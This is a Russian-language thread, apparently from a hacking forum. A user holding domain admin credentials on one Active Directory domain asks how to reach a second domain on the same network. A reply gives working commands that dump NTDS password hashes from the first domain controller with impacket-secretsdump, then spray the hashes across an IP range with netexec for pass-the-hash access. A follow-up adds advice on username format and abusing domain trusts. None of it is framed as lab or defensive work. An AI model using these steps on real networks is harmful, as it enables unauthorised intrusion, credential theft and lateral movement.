• XSS.stack #1 – первый литературный журнал от юзеров форума

Domain по соседству

heis

Почетный читатель
Пользователь
Регистрация
17.02.2022
Сообщения
40
Реакции
22
Депозит
0.0114
Привет!
В одной сети имеется 2 домена на разных диапазонах. Домен с №1 полностью под контролем от него имееюся креды от ДА.
Со вторым сложности, не могу найти креды.
Есть ли способ вытащить креды с DC №1 для доступа ко второму ?
 
Последнее редактирование:
Не совсем понятно, у тебя есть доступ на DC второго домена, от которого не можешь найти креда?
Нет доступа от воторого ДК, от первого имеется.
Криво написал изначально, уже засыпал )
 
impacket-secretsdump -just-dc domain.local/DC1\$@dcip

Делает дамп нтдс. Берем user/nthash и сканим сеть.
nxc -t 50 smb ip_range -u ‘user’ -H ‘nthash’
 
impacket-secretsdump -just-dc domain.local/DC1\$@dcip

Делает дамп нтдс. Берем user/nthash и сканим сеть.
nxc -t 50 smb ip_range -u ‘user’ -H ‘nthash’
Благодарю. =)
 
Благодарю. =)
Не забудь что поле юзер нужно заполнять с доменом того траста который ты спреишь в формате DOMAIN2\user
И проверь может это траст, тогда твои Enterprise Admins уже имеют доступ на дк, тогда и спреить ничего не нужно
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх